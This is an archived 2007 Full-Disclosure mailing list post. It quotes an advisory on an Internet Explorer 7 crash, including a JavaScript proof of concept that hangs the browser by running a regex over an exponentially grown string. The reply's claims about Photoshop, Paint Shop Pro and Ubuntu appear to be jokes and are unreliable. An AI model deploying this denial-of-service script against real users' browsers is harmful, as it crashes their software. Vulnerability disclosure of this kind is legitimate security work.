lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 17 Apr 2007 17:53:34 -0400
From: "Dr. Neal Krawetz, PhD" <neal.krawetz@....hush.com>
To: <full-disclosure@...ts.grok.org.uk>, <sil@...iltrated.net>
Subject: Re: Internet Explorer Crash

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have confirmed that both Adobe Photoshop 7.0 and 7.1 are
vulnerable to this issue.  However all versions of Paint Shop Pro
that I tested are not vulnerable.  I repeat, Paint Shop Pro is not
vulnerable to this issue.

Ubuntu is not vulnerable to this issue in any way.

Good find buddy!

- - Dr. Neal Krawetz, PhD
http://www.hackerfactor.com/blog/


On Tue, 17 Apr 2007 13:09:50 -0400 "J. Oquendo"
<sil@...iltrated.net> wrote:
>Product: Internet Explorer Version 7.0.5730.11
>Impact: Browser crash possibly more
>Author: Jesus Oquendo
>echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
>
>
>I. BACKGROUND
>Why bother? Who doesn't know what Internet Explorer and Microsoft
>are.
>
>II. DESCRIPTION
>IE 7 is vulnerable to a script which causes the browser to hang.
>The
>memory and CPU usage go through the roof. Originally the script
>caused
>(and still causes) Safari and Konqueror to crash.
>
>III SOLUTION
>Stop using Microsoft products or deal with a new advisory every
>other
>day.
>
>IV. Proof
>http://www.infiltrated.net/stupidInternetExploder.html
>
>V. Code
>
>$ more /stupidInternetExploder.html
>
><script>
>
>var reg = /(.)*/;
>
>var z = 'Z';
>                while (z.length <=
>9999999999999999999999999999999999999999999999999999999999999999999
>99999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>99999999999999999999999) z+=z;
>        var boum = reg.exec(z);
>
></script>
>
>Goodbye
>
>
>J. Oquendo
>http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
>sil . infiltrated @ net http://www.infiltrated.net
>
>The happiness of society is the end of government.
>John Adams
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkYlQWQACgkQDpFP8dW5K4Z/bQQAhmwJc2y9RBZ7nFAEWo4Q/aIpvwVj
7Xa+Ax+CUSe1O+hINFX5I+hLoPckPNVoC3YtPA7rQqT6dQ3xIubFgZAGFs62v7p936yi
p4esv/frDaklOmlEGjVZqcoxJATwj8HBPthO3YZk5D1HRJhkQ0J72ucEkBgK6tw/YeuL
dUoEASE=
=FbVw
-----END PGP SIGNATURE-----

--
Become a medical transcriptionist at home, at your own pace.
http://tagline.hushmail.com/fc/CAaCXv1R3e4Y8wdXYkvHiVBp8Vi7B9M9/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ